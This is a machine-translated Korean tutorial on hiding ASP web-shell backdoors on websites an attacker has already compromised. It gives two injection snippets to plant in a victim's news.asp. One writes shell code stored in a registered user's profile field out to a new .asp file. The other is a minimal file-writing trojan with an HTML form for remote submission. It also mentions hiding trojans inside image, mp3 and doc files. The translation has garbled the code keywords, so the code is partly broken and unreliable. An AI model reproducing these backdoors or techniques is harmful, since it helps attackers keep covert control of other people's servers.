서문: 초기 사이트 관리자부터 현재 여러 인기 있는 ASP 백도어에 이르기까지 오랜 시간이 걸렸습니다. 저는 대부분의 네트워크 관리자가 이러한 고전적인 웹셸의 이름을 Haiyang, Veteran, Blue Screen 등과 같이 지정할 수 있다고 믿습니다. 물론 요즘 시대에 백도어를 숨기려면 '부처님은 한 발이다'라는 말처럼 몇 가지 기술을 사용해야 합니다. 키도 크고, 키도 1피트예요."
앞서 언급한 것처럼 asp 트로이 목마를 사진 파일에 작성하는 것이 좋은 방법이라는 점은 부정하지 않습니다. 사실 사진뿐만 아니라 mp3 파일, doc 파일에도 작성할 수 있습니다.
파일 이름/매개변수 + 파일 이름/매개변수를 복사하여 파일 이름을 생성하는
방법을유연하게 사용하여 파일을 숨기는 목적을 달성할 수 있습니다. 특정 매개변수는 acsic 코드 모드에서는 /a, 바이너리 모드에서는 /b이므로 생략하겠습니다. 너무 자세히 설명하지 마십시오. webshell을 업로드하는 방법에 관해서는 webshell이 무엇인지는 이 기사의 범위에 포함되지 않습니다. 오늘 우리가 이야기할 것은 접미사 .mdb를 사용하여 데이터베이스에 백도어를 넣는 방법입니다. 전제는 웹쉘을 얻은 후...
우리가 알고 있듯이 많은 사이트는 사용자는 사용자 이름, 비밀번호, QQ, 이메일, 개인 프로필, 전화번호, 연락처 정보, 주소 등을 등록합니다. 데이터베이스에 해당하는 해당 테이블, 필드 및 값도 있습니다. 오늘 하려는 작업은 사용자를 등록하고 내 개인 프로필에 쉘 코드를 작성한 다음 해당 사이트의 파일을 수정하는 것입니다.이 파일을 사용할 때 트리거되면 내 개인 이력서에 쉘 코드를 넣습니다. 현재 디렉토리까지.
더 이상 고민하지 않고 코드를 살펴보겠습니다.
<%
request("action")="firefox"이면
fname=request.querystring("fn")
tname=request.querystring("tn")
bname=request.querystring("bn")
id=request.querystring("id")
idvalue=request.querystring("idv")
rs=server.createobject("ADODB.recordset")를 설정합니다.
sql="select "& bname & " from "&tname& " 여기서 "&id&"="&idvalue&""""
rs.open SQL,콘,1,3
rs.eof가 아니라면
내용=rs(b이름)
또 다른
response.write "아무것도"
종료하면
fso=Server.createObject("Scripting.FileSystemObject")를 설정합니다.
txtfile=fso.createtextfile(server.mappath(fname)) 설정
txtfile.writeline(내용)
txtfile.close
종료하면
%>
위 코드를 news.asp와 같은 사이트의 파일에 추가합니다. 우리가 알고 있는 정보에 따르면 해당 사이트에 등록한 후 데이터베이스를 다운로드하여 구조를 확인합니다. 내가 등록한 Firefox 이름은 user 테이블에 있고 해당 id 값은 119입니다. 등록된 이력서를 저장하는 데 사용되는 테이블 필드는 jl입니다.
news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
그런 다음 이를 사용하면 news.asp와 동일한 디렉터리에 firefox.asp라는 웹셸을 작성할 수 있습니다. 위의 방법은 수천 가지 숨기기 방법 중 하나라고 할 수 있습니다. 다음으로 더 편리한 또 다른 숨기기 방법에 대해 이야기하겠습니다. 이 방법은 mdb 접미사와 관련이 없습니다.
마찬가지로 news.asp를 수정하고 상대방의 news.asp에 다음 코드를 삽입합니다.
<%
request("action")="firefox"이면
n=request.form("n")
c=request.form("c")
fso=Server.createObject("Scripting.FileSystemObject")를 설정합니다.
txtfile=fso.createtextfile(server.mappath(n)) 설정
txtfile.writeline(c)
txtfile.close
종료하면
%>
이 코드는 비교적 간단하여 트로이 목마의 서버측이라고 볼 수 있습니다. 사용할 때 다음 코드를 사용하세요.
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<title>제1회 Firefox 기술 연합[www.wrsky.com]</title>
<FORM action=" http://localhost/config.asp?action ... 방법=post>
<META content="MSHTML 6.00.2900.2180" name=GENERATOR></HEAD>
<BODY>이름:<입력 크기=50
name=n width="32"><BR><BR>쉘:<TEXTAREA name=c 행=10 cols=80
width="32"></TEXTAREA><INPUT type=submit value=Save></FORM></BODY></HTML>
위 코드를 변경합니다: "http://localhost/config.asp?action= 바꾸기 "firefox"를 서버 주소로 바꾸고 로컬 .htm 파일로 저장합니다. 로컬에서 연 후 생성할 파일 이름, 파일 내용 및 원격 제출을 정의합니다. 이것은 백도어를 떠나는 또 다른 방법입니다.